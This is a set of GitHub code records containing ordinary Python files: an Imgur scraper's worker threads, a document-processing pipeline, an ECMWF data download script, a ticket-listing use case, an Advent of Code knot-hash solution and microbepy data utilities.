update_worker_status(\n # current_worker_info=current_worker_info,\n # message=f\"The String {StringX} was used. Checking next combination.\",\n # )\n # continue\n\n while True:\n if work_queue.full():\n time.sleep(1)\n else:\n work_queue.put(StringX)\n # string_set.add(StringX)\n iterations_this_run -= 1\n # check_links(StringX=StringX)\n break\n\n if iterations_this_run == 0:\n break\n\n # Wait for all tasks to complete\n # work_queue.join()\n except Exception as e:\n # print(e)\n write_error_string(error=e)\n raise Exception\n # write_error_string(error=e, StringX=StringX)\n\n# class db_updater(StringX = \"\", file_path = \"\", file_size = 0, was_image = False, response_code = 0, message=\"Empty\"):\n\n\nclass db_updater():\n # TODO Make other workers add things to the db_queue, so this worker can updater it.\n # This is to mabye skip the I/O Errors\n DB_Handler = DB_handler\n\n def fetch_last_combination():\n latest_gen = DB_Handler.fetch_last_combination()\n return latest_gen\n\n def loop_worker(current_worker_info):\n update_worker_status(message=\"Starting to check db_queue for work\", current_worker_info=current_worker_info)\n while True:\n work = db_queue.get()\n\n # StringX=\"\",\n # response_code=int(0),\n # was_image=\"\",\n # file_path=\"\",\n # file_size=int(0),\n # message=\"\"\n\n # StringX=work[\"StringX\"],\n # response_code=int(work[\"response_code\"]),\n # was_image=work[\"was_image\"],\n # file_path=work[\"file_path\"],\n # file_size=work[\"file_size\"],\n # message=work[\"message\"]\n\n \n update_worker_status(message=f\"Starting to work with {work['work_type']}\", current_worker_info=current_worker_info)\n if work[\"work_type\"] == \"submit_new_stringX\":\n kwargs = {}\n try:\n for arg in work.keys():\n if arg in work:\n kwargs[arg] = work[arg]\n else:\n kwargs[arg] = None\n\n update_worker_status(message=f\"Sending {work['work_type']} to DB_Handler. StringX: {work['StringX']}\", current_worker_info=current_worker_info)\n DB_handler.submit_new_stringX(**kwargs)\n \n except Exception as e:\n raise Exception(e)\n # if work[\"work_type\"] == \"submit_new_stringX\":\n\n else:\n raise ValueError(f\"Invalid Work_type: {work['work_type']}\")\n\n# def create_database(settings):\n# if not os.path.isfile(\"file_db.db\"):\n# DB_handler.create_new_database()\n# # Update database with current data:\n# print(\"Creating Database\")\n# for root, dirs, files in os.walk(settings[\"download_folder\"]):\n# for file in files:\n# path = os.path.join(root, file)\n# file_size = os.stat(path).st_size\n# StringX = file.split(\".\")[0]\n \n# DB_handler.submit_new_StringX(StringX = StringX, file_path=path, file_size=file_size, was_image=True, response_code=200)\n# # filename_tuple = tuple(StringX)\n# # file_path = os.path.join(dir, file)\n# # sqlquerry = \"INSERT INTO FILESDB (StringX, file_path, file_size, was_image, message) values(?, ?, ?, ?, ?)\"\n# # con.execute(sqlquerry, (StringX, file, file_size, True, \"\"))\n\n\ndef create_new_worker(work):\n global ErrorLogs\n global current_workers\n global threads_amount\n\n # Create worker:\n current_worker_info = {\n \"Current_Work\": work,\n \"current_message\": \"Birthed\",\n \"WorkerID\": str(uuid.uuid4()),\n }\n\n # print(f\"Creating worker {work}. Info: {current_worker_info}\")\n # Give worker a job:\n if work == \"check_links\":\n \n current_worker_info[\"current_message\"] = \"Got job checking strings!\"\n # Create worker thread:\n t = threading.Thread(target=check_links_start, args=(current_worker_info,))\n\n elif work == \"db_worker\":\n \n current_worker_info[\"current_message\"] = \"Got job working with the SQL DB!\"\n # Create worker thread:\n t = threading.Thread(target=db_updater.loop_worker, args=(current_worker_info,))\n\n elif work == \"create_strings\":\n \n current_worker_info[\"current_message\"] = \"Got job creating links.\"\n # Create worker thread:\n t = threading.Thread(target=create_strings,\n args=(current_worker_info,))\n\n elif work == \"update_terminal\":\n \n current_worker_info[\"current_message\"] = \"Got job updating Terminal.\"\n # Create worker thread:\n t = threading.Thread(target=update_terminal)\n\n elif work == \"fetch_files_number_and_size\":\n \n current_worker_info[\"current_message\"] = \"Got job updating Terminal.\"\n # Create worker thread:\n t = threading.Thread(target=fetch_files_number_and_size)\n else:\n print(f\"Worker got no job! Work: {work}\")\n raise Exception(\"Worker got no job!\")\n\n # Add worker to list:\n current_workers[current_worker_info[\"WorkerID\"]] = current_worker_info\n\n t.daemon = False\n # current_worker_info[\"current_message\"] = \"Got all my settings!\"\n t.start()\n\n\n# def write_last_info(mode=\"\"):\n# global total_iterations\n# global latest_string_from_File\n\n# filePath = \"/00LastStringX.txt\" ## TODO Add this to settings file if it is still needed.\n# if not os.path.isfile(filePath):\n# with open(settings[\"error_filename\"], \"w+\") as f:\n# f.write(\"\")\n \n# try:\n# if mode == \"Restore\":\n# import ast\n\n# try:\n# with open(filePath, \"r+\") as file:\n# # latest_string_from_File, total_iterations = tuple(file.read())\n# tuple_value = ast.literal_eval(file.read())\n# latest_string_from_File, total_iterations = tuple_value\n# return\n# except SyntaxError:\n# return\n\n# except FileNotFoundError:\n# return\n# with open(filePath, \"w+\") as file:\n# tuple = (latest_string, total_iterations)\n# file.write(str(tuple))\n\n\n# os.system(\"clear\")\n\n# Load last StringX\n# print(\"Loading last info\")\n# write_last_info(mode=\"Restore\")\n\n# Fetching SQL DB\n# SQLDB = sql.connect('file_db.db')\n\n# create_database(settings)\n\n# TODO I really want to make this into a WebUI, but i don't have the time right now...\n\nprint(\"Creating Workers \")\ncreate_new_worker(work=\"update_terminal\")\ncreate_new_worker(work=\"db_worker\")\ncreate_new_worker(work=\"create_strings\")\n# create_new_worker(work=\"fetch_files_number_and_size\") # No need for this after converting to sqlite\nfor i in range(settings[\"max_threads\"]):\n create_new_worker(work=\"check_links\")\n","repo_name":"Walmann/ImgurScraper","sub_path":"ImgurDownloader.py","file_name":"ImgurDownloader.py","file_ext":"py","file_size_in_byte":30372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13079195568","text":"import os\nimport json\nimport tempfile\nfrom typing import Tuple, Dict\n\nfrom werkzeug.datastructures import FileStorage\n\nfrom doc_resolve import DocFormatValidator, DocPreprocessor, DocTextResolver, MultiDocument\nfrom NER_resolve import TextRecognition\nfrom tools.ExceptionsWithCodes import ClientError, ServerError\n\n\n\ndef handle_multi_doc(doc_file: FileStorage) -> Dict:\n \"\"\"\n один общий метод для обработки документа, на вход которого будет поступать сам документ (многостраничный tiff). В процессе обработки:\n из него будет извлекаться текст (задание 1);\n графические объекты (задание 2);\n тексты страниц будут классифицировать на первые и не первые (задание 3);\n из первых страниц будут извлечены значимые факты (задание 4);\n :param doc_file: uploaded image file with request information\n :return: json\n \"\"\"\n\n \"Task 1\"\n\n if not DocFormatValidator(doc_file):\n raise ServerError(\"Failed to validate document format\")\n\n try:\n # Необходимо записывать в файл, потому что cv2.imreadmulti читает только из файла, но не из буфера\n # Если внутри with.. то временный файл просто не процессится img=None, быстро установить причину не удалось. Возможно блокировка\n with tempfile.NamedTemporaryFile(mode='w+b', suffix=\".tiff\", delete=False) as temp_file:\n buffer = doc_file.stream.read()\n temp_file.write(buffer)\n\n multi_doc = MultiDocument(temp_file.name)\n\n docPreprocessor = DocPreprocessor(multi_doc)\n preprocessed_multi_doc = docPreprocessor.preprocess()\n\n except Exception as e:\n raise e\n finally:\n if os.path.exists(temp_file.name):\n os.remove(temp_file.name)\n\n doc_text = DocTextResolver(preprocessed_multi_doc)\n doc_text.reduce_data_with_conf_less_than(40)\n pages_tokenized = doc_text.process()\n\n task_1_result_dict = doc_text.to_dict(pages_tokenized)\n\n \"Task 2 - not implemented\"\n task_2_result_dict = {}\n\n \"Task 3 - not implemented\"\n task_3_result_dict = {\n \"source\": {\n \"width\": None,\n \"height\": None,\n \"type\": \"other\"\n }\n }\n\n \"Task 4\"\n\n text_rec = TextRecognition(pages_tokenized)\n task_4_result_dict = text_rec.to_dict()\n\n return {\"task_1\": task_1_result_dict,\n \"task_2\": task_2_result_dict,\n \"task_3\": task_3_result_dict,\n \"task_4\": task_4_result_dict}\n","repo_name":"SeptEmver/documents_pipeline","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37439994086","text":"from ecmwfapi import ECMWFService\nimport pandas as pd\n\nserver = ECMWFService(\"mars\")\n \ndate_end = pd.date_range(start='2012-01-01', end='2020-01-01', freq='M')\ndate_start = pd.date_range(start='2012-01-01', end='2019-12-02', freq='MS')\n\nfor x, y in zip(date_start, date_end):\n date = x.strftime('%Y-%m-%d') +'/to/'+y.strftime('%Y-%m-%d')\n datestemp = date[14:21]\n target = 'Ctrl6_%s.nc' % (datestemp)\n server.execute({\n \"class\" : \"od\",\n \"stream\" : \"enfo\",\n \"expver\" : \"1\",\n \"type\" : \"cf\",\n \"levtype\" : \"sfc\",\n \"time\" : \"00\",\n \"step\" : \"6\",\n \"date\" : date,\n \"param\" : \"228.128\",\n \"grid\" : \"0.25/0.25\",\n \"format\" : \"netcdf\",\n },\n target)\n\n","repo_name":"evwalz/epc","sub_path":"scripts_download&prepare_data/ecmwf_down.py","file_name":"ecmwf_down.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"18988681717","text":"from tortoise.queryset import QuerySet\n\nfrom common.paginations import PagePagination\nfrom ..entities import BaseAdditionalServiceCase\nfrom ..repos import (\n AdditionalServiceTicketRepo as TicketRepo,\n AdditionalServiceTicket as Ticket,\n AdditionalServiceTemplatetRepo as TemplateRepo,\n AdditionalServiceTemplate as Template,\n AdditionalServiceGroupStatusRepo as GroupStatusRepo,\n AdditionalServiceGroupStatus as GroupStatus,\n)\n\n\nclass TicketListCase(BaseAdditionalServiceCase):\n \"\"\"\n Кейс получения списка категорий и услуг\n \"\"\"\n\n TEMPLATE_SLUG: str = \"service_list\"\n CANCELED_TICKET_SLUG: str = \"ticket_canceled\"\n\n def __init__(\n self,\n ticket_repo: type[TicketRepo],\n template_repo: type[TemplateRepo],\n group_status_repo: type[GroupStatusRepo],\n ) -> None:\n self.ticket_repo: TicketRepo = ticket_repo()\n self.template_repo: TemplateRepo = template_repo()\n self.group_status_repo: GroupStatusRepo = group_status_repo()\n\n async def __call__(\n self, category_id: int | None, user_id: int, pagination: PagePagination\n ) -> dict:\n filters: dict = dict(user_id=user_id)\n if category_id:\n filters.update(service__category_id=category_id)\n qs_options: dict = dict(filters=filters)\n count: int = await self.ticket_repo.count(**qs_options)\n qs_options.update(\n related_fields=[\"group_status\", \"service__category\"],\n start=pagination.start,\n end=pagination.end,\n ordering=\"-id\",\n )\n tickets_result_qs: QuerySet = self.ticket_repo.list(**qs_options)\n tickets: list[Ticket] = await tickets_result_qs\n template: Template = await self.template_repo.retrieve(\n filters=dict(slug=self.TEMPLATE_SLUG)\n )\n available_group_statuses: list[GroupStatus] = await self.group_status_repo.list(\n excluded=dict(slug=self.CANCELED_TICKET_SLUG)\n )\n ticket_result: dict = dict(\n count=count,\n result=tickets,\n page_info=pagination(count=count),\n template=template,\n statuses=available_group_statuses,\n )\n return ticket_result\n","repo_name":"r2r2/strana_backend","sub_path":"cabinet/src/additional_services/use_cases/ticket_list.py","file_name":"ticket_list.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38977062868","text":"def reverse(l, start, end):\n '''\n Reverse a section of l from start to start + distance. These values\n don't need to be less than the size of the list; they will be modded by its\n size. Mutates l.\n '''\n section = [l[ i % len(l)] for i in range(start, end)]\n r_section = list(reversed(section))\n for i in range(start, end):\n l[i % len(l)] = r_section[i - start]\n\ndef knot_hash(lengths, index, skip_size, l):\n '''\n Perform the knot hash (mutates l).\n '''\n for length in lengths:\n # Reverse the section from index to index + length.\n reverse(l, index, index + length)\n # These are per the spec.\n index += skip_size + length\n skip_size += 1\n # Return the new index and skip_size to be reused.\n return index, skip_size\n\ndef dense_hash(l):\n '''\n XOR groups of 16 together (len(l) must be a multiple of 16).\n '''\n dh = []\n for i in range(len(l)//16):\n # Reduce by XOR on slices of 16.\n dh.append(functools.reduce(lambda x,y: x^y, l[i*16:(i+1)*16]))\n return dh\n\ndef search(x,y, hashes, visited):\n q = [(x,y)]\n while q:\n x, y= q.pop()\n if (x,y) not in visited:\n visited.add((x,y))\n if hashes[x][y] == '1':\n possibilities = [(0,1), (1,0), (-1,0), (0,-1)]\n for dx, dy in possibilities:\n if 0 <= dx + x < 128 and 0 <= dy + y < 128:\n q.append((x + dx, y + dy))\n return visited\n \n\nwith open('14.in') as inp:\n test = 'flqrgnkx'\n s = 'xlqgujun'\n count = 0\n hashes = []\n for i in range(128):\n lengths = list(map(ord, s + '-' + str(i)))\n lengths += [17, 31, 73, 47, 23]\n l = list(range(256))\n index = skip_size = 0\n for _ in range(64):\n index, skip_size = knot_hash(lengths, index, skip_size, l) \n dh = dense_hash(l)\n b = ''.join(list(map('{0:08b}'.format, dh)))\n count += sum(map(int,b))\n hashes.append(b)\n # print(count)\n visited = set()\n regions = 0\n locations = [(i,j) for i in range(128) for j in range(128)]\n for i,j in locations:\n if (i,j) not in visited and hashes[i][j] != '0':\n visited = search(i, j, hashes, visited)\n regions += 1\n print(regions)\n\n","repo_name":"cole-k/advent-of-code-2017","sub_path":"original/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20095299202","text":"\"\"\"\nUtilities\n\"\"\"\n\nfrom microbepy.common import combination_iterator\nfrom microbepy.common import config\nfrom microbepy.common import constants as cn\nfrom microbepy.common.equivalence_class import EquivalenceClass\nfrom microbepy.common import schema\n\nimport collections\nimport math\nimport matplotlib.cm as cm\nimport numpy as np\nimport os\nimport pandas as pd\nfrom sklearn import linear_model\nimport sqlite3 as sql\nimport sys\nimport types\n\nDATA_DIR = \"Data\"\nALT_DATA_DIR = 'data_base' # Directory if project is installed\nREFERENCE_DIR = \"reference\"\nDATA_MODEL_DIR = \"data_model\"\nDATA_DIRECTORIES = set([DATA_DIR, ALT_DATA_DIR])\nGIT_DIR = \".git\"\n\n\nPYTHON_SUBDIRECTORIES = [\n \"statistics\", \"model\", \"correlation\",\n \"data\", \"plot\", \"search\", \"common\",\n ]\nSPECIES = [cn.SPECIES_MIX_DVH, cn.SPECIES_MIX_MMP]\nTOLERANCE = 0.001\nGENE_PREFIXES = ['MMP', 'DVU']\nSMALL_DETERMINANT = 1e-6\nTABLES_GENOTYPE_PHENOTYPE = [\n cn.TABLE_CULTURE, cn.TABLE_MUTATION, cn.TABLE_ISOLATE,\n cn.TABLE_CULTURE_ISOLATE_LINK, cn.TABLE_ISOLATE_MUTATION_LINK,\n cn.TABLE_GENE_DESCRIPTION,\n ]\n\nVenn = collections.namedtuple('Venn', ['both', 'only1', 'only2'])\n\ndef isNumber(obj):\n try:\n _ = float(obj)\n return True\n except:\n return False\n\ndef isStr(obj):\n \"\"\"\n :return bool: True if string or unicode\n \"\"\"\n type_string = str(type(obj))\n if 'str' in type_string or 'unicode' in type_string:\n return True\n else:\n return False\n\ndef toNumber(obj):\n \"\"\"\n Attempts to convert object to a number.\n First an int, then a float.\n If all fail, returns np.nan.\n \"\"\"\n for typ in [int, float]:\n try:\n val = typ(obj)\n return val\n except:\n pass\n return np.nan\n \n\ndef isStr(obj):\n \"\"\"\n :return bool: True if string or bytes\n \"\"\"\n type_string = str(type(obj))\n if 'str' in type_string or 'bytes' in type_string:\n return True\n else:\n return False\n\ndef isFloatsEqual(fp1, fp2, tolerance=TOLERANCE):\n \"\"\"\n Tests for approximate equality between two floating points.\n :param float fp1:\n :param float fp2:\n :param float tolerance: a positive number less than 1\n :return bool:\n \"\"\"\n if fp2 == 0:\n if fp1 == 0:\n return True\n else:\n return False\n return (fp1 - fp2)/fp2 < tolerance\n\ndef getPath(path_initial, path_last):\n \"\"\"\n Constructs a path from the initial segment and the\n termination (path_list).\n :param list-of-str path_initial:\n :param str/None pat_list:\n :return str:\n \"\"\"\n def makeItem(item):\n \"\"\"\n Constructs a list containing either just the single item\n (if it's non-None) or an empty list.\n :param object item:\n :return list:\n \"\"\"\n if item is None:\n return []\n else:\n return [item]\n\n path_elements = list(path_initial)\n addendum = makeItem(path_last)\n path_elements.extend(addendum)\n #\n path = path_elements[0]\n if len(path_elements) > 1:\n for ele in path_elements[1:]:\n path = os.path.join(path, ele)\n return path\n\ndef getDataModelPath(filename):\n \"\"\"\n :return str path: path to data model.\n :param str filename or None: name of file in sequence data\n if None, returns the path to the directory\n \"\"\"\n if cn.IS_TEST:\n return cn.TEST_PATH\n else:\n try:\n path = getIdentifiedDirectory(key_directory=GIT_DIR)\n result = getPath([path, DATA_DIR, DATA_MODEL_DIR],\n filename)\n except ValueError:\n path = getIdentifiedDirectory(key_directory=ALT_DATA_DIR)\n result = getPath([path, ALT_DATA_DIR], filename)\n return result\n\ndef getReferenceDataPath(filename):\n \"\"\"\n :return str path: path to processed data\n :param str filename or None: name of file in sequence data\n if None, returns the path to the directory\n \"\"\"\n root_directory = getIdentifiedDirectory()\n return getPath([root_directory, DATA_DIR, REFERENCE_DIR],\n filename)\n\ndef getSequenceDataPath(filename):\n \"\"\"\n Provides a path to the sequence data.\n :param str filename or None: name of file\n if None, returns the path to the directory\n \"\"\"\n return getPath([getRootDataDirectory(),\n \"sequence_data\"], filename)\n\ndef getRateYieldDataPath(filename):\n \"\"\"\n Provides a path to the rate-yield data.\n :param str filename or None: name of file\n if None, returns the path to the directory\n \"\"\"\n return getPath([getRootDataDirectory(),\n \"growth_data\", \"rate_yield\"], filename)\n\ndef getODTimeseriesDataPath(filename):\n \"\"\"\n Provides a path to the rate-yield data.\n :param str filename or None: name of file\n if None, returns the path to the directory\n \"\"\"\n return getPath([getRootDataDirectory(),\n \"growth_data\", \"OD_timeseries\"], filename)\n\ndef getGeneNamesFromList(columns):\n \"\"\"\n :param list-of-str columns: list of names, some of which are genes\n :return list-of-str:\n \"\"\"\n names = []\n for pfx in GENE_PREFIXES:\n pfx_len = len(pfx)\n for ele in columns:\n if not isNull(ele):\n if ele[0:pfx_len] == pfx:\n names.append(ele)\n return names\n\ndef isStr(v):\n if isinstance(v, str):\n return True\n if isinstance(v, bytes):\n return True\n\ndef messageConsole(msg):\n print(\"*** %s\" % msg)\n\ndef isNan(v):\n if isinstance(v, float):\n return np.isnan(v)\n else:\n return False\n\ndef isNull(v):\n if isNan(v):\n return True\n singleton_types = [str, int, bytes, type(None)]\n if any([isinstance(v, t) for t in singleton_types]):\n if v is None:\n return True\n if (v == \"None\") or (v == \"none\") or (v == \"nan\"):\n return True\n return False\n\ndef isNanInDataFrame(df, nan_columns=None):\n \"\"\"\n :param pd.DataFrame df:\n :return bool, list-of-str: list of nan columns\n \"\"\"\n if nan_columns is None:\n nan_columns = []\n columns = []\n for col in df.columns.tolist():\n if col in nan_columns:\n continue\n if any([isNan(x) for x in df[col].tolist()]):\n columns.append(col)\n if len(columns) == 0:\n return False, columns\n else:\n return True, columns\n\n\ndef replaceNan(df, columns=None, value=0):\n \"\"\"\n Replaces nan values in specified columns of a dataframe.\n :param pd.DataFramed df:\n :param list-of-str columns: columns to be transformed\n :param object value:\n \"\"\"\n if columns is None:\n columns = df.columns.tolist()\n for column in columns:\n new_values = [value if isNan(x) else x for x in df[column]]\n df[column] = new_values\n \ndef getColorMap(num_colors=20):\n \"\"\"\n :return list-of-color:\n \"\"\"\n # generate data\n N = num_colors\n x = np.random.random(size=N) * 100\n y = np.random.random(size=N) * 100\n radii = np.random.random(size=N) * 1.5\n \n # get a colormap from matplotlib\n colormap =cm.get_cmap(\"gist_rainbow\") #choose any matplotlib colormap here\n \n # define maximum and minimum for cmap\n colorspan=[40,140]\n \n # create a color channel with a value between 0 and 1\n # outside the colorspan the value becomes 0 (left) and 1 (right)\n cmap_input=np.interp(np.sqrt(x*x+y*y),colorspan,[0,1],left=0,right=1)\n \n # use colormap to generate rgb-values\n # second value is alfa (not used)\n # third parameter gives int if True, otherwise float\n A_color=colormap(cmap_input,1,True)\n \n # convert to hex to fit to bokeh\n bokeh_colors = [\"#%02x%02x%02x\" % (r, g, b) for r, g, b in A_color[:,0:3]]\n return bokeh_colors\n\ndef getColumnsFromDataFrame(df, columns):\n \"\"\"\n :return pd.DataFrame: has the specified columns\n :raises ValueError: column not present\n \"\"\"\n trues = [c in df.columns.tolist() for c in columns]\n if not all(trues):\n raise ValueError(\"Column not present in DataFrame\")\n return pd.DataFrame(df[columns])\n\ndef changeColumnValues(df, func):\n \"\"\"\n Change values in the columns.\n :param DataFrame df:\n :param Function func:\n Inputs: column (str), value (float)\n Output: float\n \"\"\"\n for col in df.columns:\n values = df[col].tolist()\n new_values = [func(col, v) for v in values]\n df[col] = new_values\n\ndef setNoneList(values):\n \"\"\"\n :param list/None values:\n :return list\n \"\"\"\n if values is None:\n return []\n else:\n return values\n\ndef getColumnType(column):\n \"\"\"\n Finds the type for a column\n :param str column:\n :return type:\n \"\"\"\n for column_schema in cn.TABLE_SCHEMAS.column_schemas.getSchemas():\n if column == column_schema.name:\n return column_schema.data_type\n raise RuntimeError(\"Column %s is not typed\" % column)\n\ndef cleanDF(df, is_reset_index=False):\n \"\"\"\n Removes duplicates and stray columns.\n Removes all columns of the form \"index_\".\n :param pd.DataFrame df:\n \"\"\"\n df.drop_duplicates(inplace=True)\n df = pruneNullRows(df)\n if is_reset_index:\n resetIndex(df)\n remove_column = \"%s_\" % cn.INDEX\n for column in df.columns:\n if (column.find(remove_column) == 0) \\\n or (column == cn.INDEX):\n del df[column]\n return df\n\ndef resetIndex(df):\n \"\"\"\n Resets the index handling stray columns.\n :param pd.DataFrame df:\n \"\"\"\n LEVEL_0 = 'level_0'\n columns = df.columns\n if LEVEL_0 in columns:\n del df[LEVEL_0]\n df.reset_index(inplace=True)\n if LEVEL_0 in columns:\n del df[LEVEL_0]\n\ndef standardize(df, columns=None):\n \"\"\"\n Standardizes a numeric column in a dataframe.\n :param pd.DataFrame df:\n :param list-of-str columns\n \"\"\"\n if columns is None:\n columns = df.columns\n for column in columns:\n std = np.std(df[column])\n avg = np.mean(df[column])\n if np.isclose(std, 0):\n df[column] = 0\n else:\n df[column] = (df[column] - avg)/std\n\ndef deleteColumns(df, columns, is_drop_duplicates=True):\n \"\"\"\n Deletes columns from the DataFrame, if they are present.\n :param pd.DataFrame df:\n :param list-of-str columns:\n :param bool is_drop_duplicates:\n \"\"\"\n for column in columns:\n if column in df.columns:\n del df[column]\n if is_drop_duplicates:\n df.drop_duplicates(inplace=True)\n\ndef trimDF(df, keep_columns=None, delete_columns=None):\n \"\"\"\n Keeps/deletes columns in a dataframe.\n Exactly one of keep_columns/delete_columns can be non-None.\n :param pd.DataFrame df:\n :param list-of-str keep_columns: Columns to keep\n :param list-of-str delete_columns: Columns to delete\n :return pd.DataFrame:\n \"\"\"\n if keep_columns is None and delete_columns is None:\n raise ValueError(\"Invalid parameters.\")\n if not keep_columns is None and not delete_columns is None:\n raise ValueError(\"Invalid parameters.\")\n if keep_columns is not None:\n df_result = df[keep_columns].copy(deep=True)\n if delete_columns is not None:\n df_result = df.copy(deep=True)\n deleteColumns(df_result, delete_columns, is_drop_duplicates=True)\n df_result.drop_duplicates(inplace=True)\n return df_result\n\ndef makeNullRow(df, null=np.nan):\n \"\"\"\n Creates a row of null values to the dataframe.\n :param object null: value in row\n :return dict: row\n \"\"\"\n row = {}\n for column in df.columns.tolist():\n row[column] = null\n return row\n\ndef addNullRow(df, null=np.nan):\n \"\"\"\n Adds a row of null values to the dataframe.\n :param object null: value in row\n :return pd.DataFrame:\n \"\"\"\n return df.append(makeNullRow(df), ignore_index=True)\n\ndef getDBPath():\n \"\"\"\n The correct choice of a path depends on the runtime environment:\n 1. Running with .microbepy/config.yml in the home\n directory (includes case of being installed)\n SQLDB_PATH: \n 2. Running within the microbepy project: \n microbepy/Data/data_model/sythetic.db\n 3. Running as a subproject:\n /Data/data_model/microbepy.db\n :return str:\n :raises KeyError: configuration file exists but no DB path\n :raises ValueError: cannot find .git file for project root\n \"\"\"\n try:\n path = config.get(key=cn.SQLDB_PATH_NAME)\n except KeyError:\n path = None\n if path is None:\n try:\n gitbase_path = getIdentifiedDirectory(key_directory=GIT_DIR)\n except:\n raise ValueError(\"Cannot find project directory.\")\n path = getPath([gitbase_path, \"Data\", \"data_model\"], \n cn.SYNTHETIC_DB)\n return path\n\ndef getDBConnection(path=None):\n if path is None:\n path = getDBPath()\n try:\n conn = sql.connect(path)\n except:\n raise ValueError(\"Invalid path to DB: %s\" % path)\n return conn\n\ndef getDuplicates(values):\n \"\"\"\n :param list-of-object values:\n :return list-of-object:\n \"\"\"\n result = list(values)\n [result.remove(x) for x in set(values)]\n return result\n\ndef typeDF(df, columns=None):\n \"\"\"\n Ensures that column values are of the correct type.\n :param list-of-str columns:\n :return pd.DataFrame:\n \"\"\"\n if columns is None:\n columns = list(df.columns)\n for column in columns:\n typ = getColumnType(column)\n values = df[column]\n df[column] = [np.nan if isNull(v) else typ(v) for v in values]\n return df\n\ndef removeDuplicateColumns(df):\n \"\"\"\n Removes columns that have a duplicate name.\n :return pd.DataFrame:\n \"\"\"\n duplicates = getDuplicates(df.columns)\n done = False\n idx = 0\n df_result = df.copy()\n additions_dict = {}\n while not done:\n if idx >= len(df_result.columns):\n done = True\n break\n column = df_result.columns[idx]\n if column in duplicates:\n df1 = df_result[column]\n values = df1.iloc[:,1]\n del df_result[column]\n duplicates.remove(column)\n additions_dict[column] = values\n else:\n idx += 1\n df_add = pd.DataFrame(additions_dict)\n df_result = pd.concat([df_result, df_add], axis=1, sort=True)\n return df_result\n\ndef makeVenn(group1, group2):\n \"\"\"\n Constructs the Venn regions for two groups:\n both - overlap between the groups\n only1 - only n group 1\n only2 - only n group 2\n :param list-of-object group1:\n :param list-of-object group2:\n :return Venn:\n \"\"\"\n set1 = set(group1)\n set2 = set(group2)\n return Venn(\n both=set1.intersect(set2),\n only1=set1.difference(set2),\n only2=set2.difference(set1),\n )\n\ndef selNonNull(values1, values2):\n \"\"\"\n Selects the non-null value of the two lists in its position.\n :param list-of-object values1:\n :param list-of-object values2:\n :param list-of-object result:\n \"\"\"\n if len(values1) != len(values2):\n raise ValueError(\"Inputs must have the same length.\")\n pairs = zip(values1, values2)\n result = []\n for x,y in pairs:\n if x == y:\n result.append(x)\n elif isNull(x):\n result.append(y)\n elif isNull(y):\n result.append(x)\n else:\n msg = \"Inputs must be identical if in the same position and non-null.\"\n raise ValueError(msg)\n return result\n \ndef mergeRowsColumns(df1, df2, merge_column):\n \"\"\"\n Merges the two dataframes, combining both rows and columns.\n Column values are appended where the dataframes have the same columns.\n nan values are added to columns where the column is not present\n in a dataframe.\n :param pd.DataFrame df1:\n :param pd.DataFrame df2:\n :param str merge_column: column on which the merge is done\n :return pd.DataFrame: Has columns df1.columns + df2.columns\n \"\"\"\n LEFT = \"__left\"\n RIGHT = \"__right\"\n df_1 = removeDuplicateColumns(df1)\n cleanDF(df_1)\n df_2 = removeDuplicateColumns(df2)\n cleanDF(df_2)\n df_result = df_1.merge(df_2, on=merge_column, how='outer',\n suffixes=(LEFT, RIGHT))\n # Merge the overlapping columns\n left_overlaps = [c for c in df_result.columns\n if c[-len(LEFT):] == LEFT]\n left_overlaps.sort()\n right_overlaps = [c for c in df_result.columns\n if c[-len(RIGHT):] == RIGHT]\n right_overlaps.sort()\n pairs = zip(left_overlaps, right_overlaps)\n for left, right in pairs:\n values = selNonNull(df_result[left], df_result[right])\n pos = left.find(LEFT)\n column = left[0:pos]\n del df_result[left]\n del df_result[right]\n df_result[column] = values\n # Finalize result\n cleanDF(df_result)\n return df_result\n\ndef readSQL(cmd, path=None):\n \"\"\"\n Creates a dataframe for the SQL query.\n 1. Duplicate column names (ending with ':n') are merged.\n 2. Deletes columns that begin with 'index'\n 3. None values have a consistent representation\n :param str/TableSchema cmd: SQL query command or TableSchema,\n if want the entire table\n :param str path: path to database\n :return pd.DataFrame:\n \"\"\"\n SEP = \":\"\n if isinstance(cmd, schema.TableSchema):\n sql_cmd = \"SELECT * FROM %s\" % cmd.name\n else:\n sql_cmd = cmd\n conn = getDBConnection(path=path)\n df_result = pd.read_sql(sql_cmd, conn)\n conn.close()\n done = False\n while not done:\n duplicates = [c for c in df_result.columns if c.count(SEP) > 0]\n if len(duplicates) == 0:\n done = True\n break\n column = duplicates[0]\n pos = column.find(SEP)\n column = column[:pos]\n columns = [c for c in df_result.columns if c.count(column) > 0]\n # Delete index columns\n if column in ['level_0', cn.INDEX]:\n for col in columns:\n del df_result[col]\n # Merge other columns\n else:\n col_first = columns[0]\n values = df_result[col_first].tolist()\n del df_result[col_first]\n columns = columns[1:]\n for col in columns:\n try:\n values = selNonNull(values, df_result[col].tolist())\n except:\n import pdb; pdb.set_trace()\n del df_result[col]\n df_result[column] = values\n df_result = unifyNullValues(df_result)\n return df_result\n\ndef unifyNullValues(df_value):\n \"\"\"\n Makes all null df_value cn.NONE.\n :param pd.DataFrame df_value:\n :return pd.DataFrame:\n \"\"\"\n return df_value.fillna(value=np.nan)\n #return df_value.applymap(lambda v: cn.NONE if isNull(v) else v)\n\ndef pruneNullRows(df):\n \"\"\"\n Removes rows that are all nulls.\n :param pd.DataFrame df:\n This is done in place to avoid storage problems with large dataframes.\n :return pd.DataFrame:\n \"\"\"\n return df.dropna(axis=0, how='all')\n\ndef pruneRowsWithNullColumns(df, columns):\n \"\"\"\n Deletes rows where there is a null value in any of a list\n of columns.\n :param pd.DataFrame df:\n :param list-of-str colums:\n :return pd.DataFrame:\n \"\"\"\n def check(row):\n return not any([isNull(row[c]) for c in columns])\n #\n sel = df.apply(check, axis=1)\n return pd.DataFrame(df.loc[sel])\n\ndef coerceDF(df):\n \"\"\"\n Coerces the columns to their type if the type is known.\n :param pd.DataFrame 